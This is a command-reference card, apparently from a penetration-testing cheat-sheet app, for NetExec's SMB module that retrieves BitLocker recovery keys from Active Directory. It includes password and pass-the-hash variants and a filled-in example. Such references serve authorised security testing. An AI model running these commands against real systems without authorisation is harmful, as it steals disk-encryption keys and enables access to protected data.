NetExec SMB BitLocker Recovery Keys
Retrieve BitLocker recovery keys stored in Active Directory
- Tool
- nxc
- Category
- Post-Exploitation / Data Collection
- Platform
- linux
- Requires
- password
- Protocols
- SMB, LDAP
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc smb '<ip>' -u '<user>' -p '<password>' -M bitlocker
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
nxc smb '<ip>' -u '<user>' -H '<hash>' -M bitlocker
Examples
nxc smb '192.168.1.100' -u 'administrator' -p 'password' -M bitlocker
Tags
Related commands
- Impacket NTFS-Read (Offline NTDS Browse) Browse a raw NTFS image (e.g. a VSS shadow copy of C:\Windows\NTDS) offline as if it…
- NetExec RDP Screenshot Capture a screenshot of the current RDP login screen / desktop without authenticating…
- NetExec WMI bitlocker Module Pull BitLocker recovery keys from a host over WMI. Faster than the SMB equivalent in…
- SMBClient Recursive Download Download folder recursively from SMB share